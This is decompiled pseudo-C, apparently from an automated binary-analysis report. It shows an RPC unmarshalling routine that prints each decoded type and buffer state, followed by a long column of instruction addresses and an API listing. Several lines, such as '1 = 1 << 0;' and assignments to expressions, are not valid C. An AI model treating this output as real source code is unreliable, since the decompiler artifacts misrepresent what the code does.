						L47:
						 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
						L1:
						while(( *( *(_t210 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t210 - 0xc) =  *( *(_t210 + 0x10)) & 0x000000ff;
							 *(_t210 - 0xc) =  *(_t210 - 0xc) - 1;
							if( *(_t210 - 0xc) > 0xb8) {
								L46:
								0x6eda0000("unhandled format %d\n",  *( *(_t210 + 0x10)) & 0x000000ff);
								_t212 = _t212 + 8;
								while(1) {
									L47:
									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t8 =  *(_t210 - 0xc) + 0x6eda9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t8 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
								case 0:
									L4:
									E6EDAAFA0( *((intOrPtr*)(_t210 + 8)),  *(_t210 + 0xc), 1);
									_push( *(_t210 + 0xc));
									_push( *( *(_t210 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6eda0000();
									_t212 = _t212 + 0x18;
									 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[0]);
									L47:
									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 2:
									L9:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("long=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 3:
									L12:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									asm("cvtss2sd xmm0, [eax]");
									__esp = __esp - 8;
									asm("movsd [esp], xmm0");
									_push("float=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L13:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L14:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L15:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L29:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L24:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L29;
									}
								case 8:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L34:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L35:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									L36:
									__ecx =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
									__ecx =  *(__ebp + 0x10);
									__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xc:
									L37:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6edbb418 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									goto L0;
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									L11:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t210 + 0xc);
					}
				}
			}





                                                                                                0x6eda9ab5
                                                                                                0x6eda9ab5
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda9acb
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
